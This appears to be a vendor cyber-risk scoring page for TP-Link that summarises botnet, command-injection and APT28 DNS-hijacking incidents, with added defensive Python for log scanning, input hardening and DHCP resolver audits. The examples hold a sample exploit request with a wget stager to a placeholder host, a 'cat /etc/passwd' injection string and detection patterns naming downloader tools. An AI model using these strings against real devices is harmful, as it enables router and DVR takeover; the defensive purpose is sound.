TSI A.I CyberSecurity Scoring
TSI
Company Information
Website: https://www.tp-link.com/us/
Employees number: 382
Number of followers: 31,892
NAICS: 334
Industry Type: Computers and Electronics Manufacturing
Homepage: tp-link.com
TSI Risk Score (AI oriented)
Between 650 and 699
Industry: Computers and Electronics Manufacturing
Updated: 02/06/2026
671/1000
Weak
B
TSI Global Score (TPRM)
Industry: Computers and Electronics Manufacturing
Score locked
Current Score
671 B (WEAK), on a 0 to 1000 scale
6 incidents
-8.75 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026: 671
MAY 2026: 671
APRIL 2026: 673
Vulnerability
20 Apr 2026 • TSI
TP-Link: Hackers Use CVE-2024-3721 to Infect TBK DVRs With Nexcorium DDoS Malware
Nexcorium Botnet Exploits Unpatched TBK DVRs and TP-Link Routers in Large-Scale DDoS Campaign
Score after incident: 668
Severity: CRITICAL (-5 points)
Incident ID: TP-1776673453
A newly uncovered botnet campaign is exploiting a vulnerability in TBK digital video recorders (DVRs) to deploy Nexcorium, a Mirai-based malware built for large-scale distributed denial-of-service (DDoS) attacks. The flaw, CVE-2024-3721 (CVSS 6.3), affects TBK's DVR-4104 and DVR-4216 models, which remain widely deployed in small businesses, retail outlets, and surveillance installations and are frequently left running outdated firmware with weak default credentials.
Attackers exploit the vulnerability by sending a crafted HTTP request to the endpoint `/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___`, achieving unauthenticated remote code execution (RCE). Once compromised, the device is enrolled in the botnet; on execution Nexcorium prints the string "nexuscorp has taken control", a deliberate signature left by the operators.
Researchers at Fortinet's FortiGuard Labs analyzed the campaign and confirmed Nexcorium's Mirai lineage: an XOR-encoded configuration table, a watchdog module for persistence, and a DDoS module that floods targets on command. The malware also spreads to end-of-life consumer routers, including legacy TP-Link models, and carries an exploit for CVE-2017-17215 (the Huawei HG532 UPnP command-injection flaw bundled by many Mirai variants), extending its reach to unpatched hardware.
Nexcorium propagates and persists through several mechanisms: self-replicating binaries, command-and-control (C2) channels, and Telnet brute-force attacks against neighbouring devices. It is built for multiple CPU architectures, which broadens the range of IoT devices it can infect. A watchdog process restarts the malware if it is killed, and an FNV-1a hash check over the binary detects tampering and restores the original file.
The dual-target strategy, covering both TBK DVRs and TP-Link routers, yields a geographically distributed attack infrastructure that can generate large, hard-to-filter DDoS traffic. Because the compromised devices sit on ordinary residential and business IP addresses, their traffic blends in with legitimate sources and complicates mitigation.
With no patch available for CVE-2024-3721, researchers recommend replacing affected TBK DVRs and vulnerable TP-Link routers. Network segmentation and disabling unnecessary remote access to DVR management interfaces are also advised to limit exposure; a DVR that must stay in service should at minimum be unreachable from the internet on its web port and isolated from the rest of the LAN.
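Because the exploit path above is a single recognisable HTTP request, the cheapest detection is a scan of the DVR's (or a reverse proxy's) access log. The following is an added example, not code from the page, from TBK, or from FortiGuard Labs: it flags requests to the `/device.rsp` endpoint with the `___S_O_S_T_R_E_A_MAX___` command token named in the reporting, and separately flags any query parameter carrying shell metacharacters or downloader verbs, so it also catches variants that reuse the endpoint with a different payload. The log lines, IP addresses and the `arg` parameter are constructed for the demonstration; the real injection parameters are not taken from the page.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Apache/nginx combined format) for a
# DVR web interface. Addresses are RFC 5737 documentation ranges; the
# "arg" parameter and its payload are invented to exercise the detector.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Apr/2026:10:01:12 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&arg=cd%20/tmp;wget%20http://198.51.100.9/arm7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [20/Apr/2026:10:01:15 +0000] "GET /index.html HTTP/1.1" 200 1034 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Apr/2026:10:01:20 +0000] "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ HTTP/1.1" 200 44 "-" "curl/8.0"
198.51.100.23 - - [20/Apr/2026:10:02:01 +0000] "GET /device.rsp?opt=sys&cmd=status HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

# Request line inside the quoted field of a combined-format log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Endpoint and opaque command token named in the public CVE-2024-3721 reporting.
EXPLOIT_PATH = "/device.rsp"
EXPLOIT_CMD = "___S_O_S_T_R_E_A_MAX___"

# Shell metacharacters and downloader verbs typical of Mirai-style stagers.
SHELL_META = re.compile(r"[;|&`]|\$\(|\b(?:wget|curl|tftp|busybox)\b|/tmp/")


def parse_query(query):
    """Split a raw query string on '&' only (never ';', which is payload here)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote(name), []).append(unquote(value))
    return params


def classify_request(target):
    """Return a list of finding tags for one request target (path + query)."""
    parts = urlsplit(target)
    params = parse_query(parts.query)
    findings = []
    if (parts.path == EXPLOIT_PATH
            and params.get("opt") == ["sys"]
            and EXPLOIT_CMD in params.get("cmd", [])):
        findings.append("cve-2024-3721-endpoint")
    for name, values in params.items():
        if any(SHELL_META.search(v) for v in values):
            findings.append("shell-metachar:" + name)
    return findings


def scan_log(text):
    """Return one record per suspicious line: source IP, timestamp, target, findings."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "target": m.group("target"), "findings": findings})
    return hits


def sources_by_hits(hits):
    """Count suspicious requests per source IP, most active first."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["findings"])
    print(sources_by_hits(scan_log(SAMPLE_LOG)))
```

The query is split on `&` by hand rather than with `parse_qs` because older Python versions also split on `;`, which would hide exactly the separator an injection relies on. A match on the endpoint token alone is worth an alert even when the parameters look clean: on a device with no patch, there is no benign reason for that request to arrive from the internet.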
APRIL 2026: 678
Vulnerability
16 Apr 2026 • TSI
TP-Link: TP-Link Router Vulnerability Enables Arbitrary Command Execution
High-Severity Command Injection Flaw Disclosed in TP-Link Routers
Score after incident: 673
Severity: CRITICAL (-5 points)
Incident ID: TP-1780381426
A high-severity authenticated command injection vulnerability, tracked as CVE-2026-5509 (CVSS v4.0: 8.5), has been identified in two TP-Link router models, the Archer BE450 v1 and Archer BE7200 v1. The flaw allows an attacker who already holds admin access to the web management interface to execute arbitrary OS commands, because a backend handler passes insufficiently sanitized input into a system command.
Exploitation requires network adjacency and high privileges, but has low complexity and needs no user interaction. A successful attack gives full control of the device, allowing the attacker to intercept network traffic, alter system configuration, or stand up unauthorized services, with significant consequences for data privacy. In practice the precondition is admin credentials, so a default, reused, or phished router password turns this post-authentication bug into a practical foothold.
The vulnerability mirrors past TP-Link router flaws, including CVE-2025-14756 (Archer MR600) and CVE-2023-1389 (Archer AX21), and highlights a recurring pattern of command injection in the Archer product line.
Affected Models & Remediation
The flaw affects Archer BE450 v1 and BE7200 v1 running firmware earlier than 1.3.0 Build 20260416. TP-Link has released a patch, and users are advised to upgrade immediately. These models are not sold in the U.S.; distribution is primarily in markets such as Japan.
Patching is the primary mitigation, but administrators should also enforce strong, unique admin credentials, restrict web management to the LAN, and disable remote management unless it is required. Given TP-Link's history of similar flaws, periodic firmware audits are recommended.
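The bug class behind this advisory is a web handler that pastes an admin-supplied value (typically the target of a ping or traceroute diagnostic) into a shell command line. The following is an added example written for this page, not TP-Link's firmware code and not derived from the advisory; the `ping` diagnostic, the function names and the allowlist rules are assumptions chosen to illustrate the pattern. It shows the vulnerable construction beside a hardened version that validates the value against an allowlist and hands it to the OS as a single argv element with no shell in between.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: labels of letters, digits and inner hyphens, dot separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
# Characters that change the meaning of a command line once /bin/sh sees it.
SHELL_META = re.compile(r"[;&|`$<>\n]|\$\(")


def build_ping_command_vulnerable(host):
    """The bug class: the admin-supplied value is interpolated into a shell string.

    Anything after ';' or inside $(...) becomes a second command when the string
    reaches /bin/sh, which is how an authenticated web handler becomes RCE.
    (Hypothetical handler; it only builds the string and never runs it here.)
    """
    return "ping -c 1 " + host


def validate_target(host):
    """Allowlist the diagnostic target: an IP literal or an RFC 1123 hostname.

    Returns the normalized value; raises ValueError for anything else,
    including values that merely contain shell metacharacters or leading '-'.
    """
    try:
        return str(ipaddress.ip_address(host))  # covers IPv4 and IPv6 literals
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError("rejected diagnostic target: %r" % host)


def build_ping_argv(host):
    """Hardened form: validated value as one argv element, no shell involved."""
    return ["ping", "-c", "1", validate_target(host)]


def contains_shell_metachars(value):
    """Defense-in-depth check a WAF or request-log rule can apply independently."""
    return SHELL_META.search(value) is not None


def run_ping(host, timeout=5):
    """Execute the hardened command with shell=False; argv goes straight to execve."""
    proc = subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    print(build_ping_command_vulnerable("192.0.2.1; cat /etc/passwd"))
    print(build_ping_argv("192.0.2.1"))
    try:
        build_ping_argv("192.0.2.1; cat /etc/passwd")
    except ValueError as exc:
        print("hardened handler:", exc)
```

The allowlist check matters more than the metacharacter blocklist: a blocklist has to anticipate every quoting trick the shell understands, while an allowlist of IP literals and hostnames rejects everything else, including a leading `-` that would otherwise be parsed as a `ping` option. Passing an argv list to `subprocess.run` with the default `shell=False` means no shell ever sees the value, which is the property the vulnerable form lacks.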
APRIL 2026: 682
Vulnerability
07 Apr 2026 • TSI
TP-Link: Russian APT28 Hackers Hijack Routers to Steal Credentials
Russian APT28 Exploits Vulnerable Routers in Large-Scale Credential Theft Campaign
Score after incident: 677
Severity: CRITICAL (-5 points)
Incident ID: TP-1775579951
The UK's National Cyber Security Centre (NCSC) has issued a warning about two ongoing cyberespionage campaigns by the Russian hacking group APT28 (also known as Fancy Bear, Forest Blizzard, and Sofacy), which is linked to Russia's GRU military intelligence service. Since early 2024, APT28 has been hijacking vulnerable internet routers, particularly TP-Link models, to redirect traffic through attacker-controlled servers and steal credentials from targeted organizations.
### How the Attack Works
APT28 has repurposed virtual private servers (VPS) as malicious DNS servers, intercepting high volumes of DNS requests from compromised routers. The group employs an opportunistic approach, initially casting a wide net to identify potential victims before narrowing down targets of intelligence value.
In one campaign, APT28 exploited CVE-2023-50224, a vulnerability in TP-Link WR841N routers that allows unauthenticated attackers to extract credentials via crafted HTTP requests. By altering the DHCP DNS settings on these routers, the group forced downstream devices (such as laptops and phones) to resolve requests through their malicious servers. This enabled adversary-in-the-middle (AitM) attacks, allowing APT28 to harvest passwords, OAuth tokens, and other credentials from web and email services.
Microsoft Threat Intelligence further reported that APT28 and its sub-group Storm-2754 have been compromising SOHO routers since at least August 2023, expanding their infrastructure to facilitate these attacks.
### Impact and Attribution
The NCSC assesses that APT28’s operations are highly targeted, focusing on entities of strategic interest to Russian intelligence. While the initial router compromises appear broad, the group refines its focus at later stages to prioritize high-value victims. The stolen credentials could enable further unauthorized access, though the exact scope of follow-on attacks remains unclear.
This campaign underscores the persistent threat posed by state-backed cyber actors leveraging common vulnerabilities in consumer-grade networking devices to conduct large-scale espionage.
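The technique at the core of this entry, and of the later Operation Masquerade entry on this page, is a change to the DNS servers the router hands out over DHCP, so that every client on the LAN resolves names through an attacker's VPS without any change on the clients themselves. The following is an added example, not code from the page, the NCSC or Microsoft: it builds a minimal DHCP ACK so the code runs offline, decodes option 6 (Domain Name Server) from the option TLVs, and compares the advertised resolvers against an operator allowlist. The MAC, the `192.168.0.0/24` LAN, the `203.0.113.0/24` "ISP resolver" block and the `198.51.100.53` "attacker" address are all constructed.

```python
import ipaddress
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_END = 0, 3, 6, 53, 255
DHCPACK = 5


def build_dhcp_ack(yiaddr, router, dns_servers, xid=0x3903F326):
    """Construct a minimal BOOTP/DHCP ACK (RFC 2131 header + RFC 2132 options).

    Used here only to produce sample bytes; a real check would feed in the
    reply captured on the client (for example with tcpdump on UDP port 68).
    """
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        2, 1, 6, 0,                 # op=BOOTREPLY, htype=Ethernet, hlen=6, hops
        xid, 0, 0x8000,             # xid, secs, flags (broadcast bit)
        b"\0" * 4,                  # ciaddr
        ipaddress.IPv4Address(yiaddr).packed,   # yiaddr: address offered
        ipaddress.IPv4Address(router).packed,   # siaddr: next server
        b"\0" * 4,                  # giaddr
        bytes.fromhex("000c29aabbcc") + b"\0" * 10,  # chaddr (constructed MAC)
        b"\0" * 64, b"\0" * 128,    # sname, file
    )
    opts = bytes([OPT_MSG_TYPE, 1, DHCPACK])
    opts += bytes([OPT_ROUTER, 4]) + ipaddress.IPv4Address(router).packed
    dns = b"".join(ipaddress.IPv4Address(s).packed for s in dns_servers)
    opts += bytes([OPT_DNS, len(dns)]) + dns
    opts += bytes([OPT_END])
    return header + MAGIC_COOKIE + opts


def parse_dhcp_options(packet):
    """Walk the TLV option area and return {code: raw_bytes}."""
    if len(packet) < 240 or packet[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet (missing magic cookie)")
    opts, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        length = packet[i + 1]
        opts[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def dns_servers_from(packet):
    """Decode option 6 (Domain Name Server) into dotted-quad strings, in order."""
    raw = parse_dhcp_options(packet).get(OPT_DNS, b"")
    return [str(ipaddress.IPv4Address(raw[j:j + 4]))
            for j in range(0, len(raw) - len(raw) % 4, 4)]


def audit_dns(packet, allowed_resolvers):
    """Return the DNS servers in the lease that fall outside the allowlist.

    An empty list means every advertised resolver is one the operator expects;
    anything else is the signature of a router whose DHCP DNS setting was rewritten.
    """
    nets = [ipaddress.ip_network(a, strict=False) for a in allowed_resolvers]
    return [s for s in dns_servers_from(packet)
            if not any(ipaddress.ip_address(s) in n for n in nets)]


# Constructed allowlist: the router itself and the ISP's resolver block.
ALLOWED = ["192.168.0.1/32", "203.0.113.0/24"]
# Benign lease versus one from a router whose DNS setting now points at an
# attacker-controlled VPS first, with the real resolver kept as a fallback
# (an assumption about operator tradecraft, not a detail from the page).
BENIGN_ACK = build_dhcp_ack("192.168.0.20", "192.168.0.1", ["192.168.0.1", "203.0.113.53"])
HIJACKED_ACK = build_dhcp_ack("192.168.0.20", "192.168.0.1", ["198.51.100.53", "192.168.0.1"])

if __name__ == "__main__":
    print("benign lease, unexpected resolvers:", audit_dns(BENIGN_ACK, ALLOWED))
    print("hijacked lease, unexpected resolvers:", audit_dns(HIJACKED_ACK, ALLOWED))
```

The check belongs on the client side of the router, because the router's own admin page will show whatever the attacker configured. On a Linux workstation the same comparison can be made against the resolvers reported by `nmcli device show` (the `IP4.DNS` lines) or `resolvectl status`; a resolver outside the allowlist, particularly one listed before the legitimate server, is the condition worth paging on.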
MARCH 2026: 682
FEBRUARY 2026: 680
JANUARY 2026: 678
DECEMBER 2025: 675
NOVEMBER 2025: 675
OCTOBER 2025: 673
SEPTEMBER 2025: 671
AUGUST 2025: 687
Cyber Attack
01 Aug 2025 • TSI
TP-Link: US operation evicts Russia from hacked SOHO routers used to breach critical infrastructure
U.S. Disrupts Russian GRU’s Global Router Hijacking Campaign Targeting Governments and Critical Infrastructure
Score after incident: 667
Severity: CRITICAL (-20 points)
Incident ID: TP-1775665616
The U.S. Department of Justice (DOJ) announced on Tuesday that it had dismantled a years-long cyberespionage operation by Russia's military intelligence agency, the GRU, which hijacked thousands of small office and home office (SOHO) routers worldwide to intercept sensitive data. The campaign, active since at least 2024 with evidence dating back to August 2023, exploited TP-Link routers to reroute DNS requests through Kremlin-controlled servers, enabling the theft of emails, passwords, and other confidential information from governments, critical infrastructure operators, and private networks.
The FBI's "Operation Masquerade" neutralized the threat by remotely resetting compromised routers and collecting forensic evidence, severing Russia's access. The operation followed a Microsoft report revealing that the GRU hacking group tracked as APT28, Fancy Bear, or Forest Blizzard had weaponized DNS hijacking to conduct adversary-in-the-middle (AiTM) attacks, particularly against Microsoft Outlook connections. An automated filtering system let the operators prioritize high-value targets, including three African government organizations and entities in the IT, telecommunications, and energy sectors.
Microsoft warned that the scale of compromised routers could amplify future AiTM attacks, though no malware delivery or denial-of-service activity has been observed yet. The GRU’s tactics reflect an evolution in its playbook, marking the first time the group has used DNS hijacking at scale to exploit edge devices for large-scale surveillance.
The disruption aligns with the FBI’s broader strategy to proactively counter state-sponsored cyber threats. Brett Leatherman, head of the FBI’s Cyber Division, emphasized the agency’s commitment to imposing costs on foreign adversaries targeting U.S. interests. The UK’s National Cyber Security Centre (NCSC) also issued an advisory on the campaign, underscoring the risks of unpatched or end-of-life networking equipment.
JULY 2025: 687
FEBRUARY 2025: 739
Breach
01 Feb 2025 • TSI
TP-Link USA
TP-Link Potential Ban Due to Security Concerns
Score after incident: 677
Severity: HIGH (-62 points)
Incident ID: TP-000022225
TP-Link, a leading router vendor in the U.S. market with historical ties to China, faces a potential ban amid security concerns and ongoing investigations. The accusations centre on the possibility that Chinese state-sponsored hackers have compromised its routers, and on the company's obligations under Chinese law to hand over sensitive information. The controversy has also raised questions about TP-Link's pricing and market dominance, with concern that low prices reflect a strategy to gain unfair influence over the U.S. market. The company disputes these concerns, pointing to its corporate restructuring, diversified manufacturing locations, and transparency with U.S. investigators.
NOVEMBER 2024: 757
Cyber Attack
01 Nov 2024 • TSI
NETGEAR, Huawei, TP-Link and D-Link: Masjesu Botnet Emerges as DDoS-for-Hire Service Targeting Global IoT Devices
Masjesu Botnet: A Stealthy DDoS-for-Hire Threat Expands Its Reach
Score after incident: 737
Severity: LOW (-20 points)
Incident ID: HUADLITP-NET1775672907
Cybersecurity researchers have uncovered Masjesu, a sophisticated botnet operating as a DDoS-for-hire service since 2023. Marketed via Telegram under the alias XorBot, the malware targets IoT devices including routers, cameras, and gateways across multiple architectures, employing XOR-based encryption to evade detection.
First documented by Chinese security firm NSFOCUS in December 2023 and linked to an operator known as synmaestro, Masjesu has since evolved. A 2024 update introduced 12 new exploits targeting devices from D-Link, Huawei, NETGEAR, TP-Link, and others, alongside enhanced DDoS flood modules. Researchers note its rapid growth, with attackers increasingly leveraging Telegram for recruitment and promotion.
Trellix’s recent analysis reveals Masjesu’s focus on volumetric DDoS attacks, particularly against CDNs, game servers, and enterprises. The botnet’s infrastructure is heavily concentrated in Vietnam (nearly 50% of observed traffic), with additional activity in Ukraine, Iran, Brazil, Kenya, and India. Once deployed, the malware establishes persistence, disables competing processes, and connects to command servers to execute attacks.
Masjesu also self-propagates by scanning for vulnerable devices, including Realtek-based routers via port 52869, a tactic previously used by botnets such as JenX and Satori. Notably, the botnet avoids high-profile targets such as the U.S. Department of Defense to minimize legal scrutiny, prioritizing long-term survival over mass infection.
As IoT exploitation expands, Masjesu’s low-visibility approach and social media-driven recruitment underscore its adaptability as a persistent cyber threat.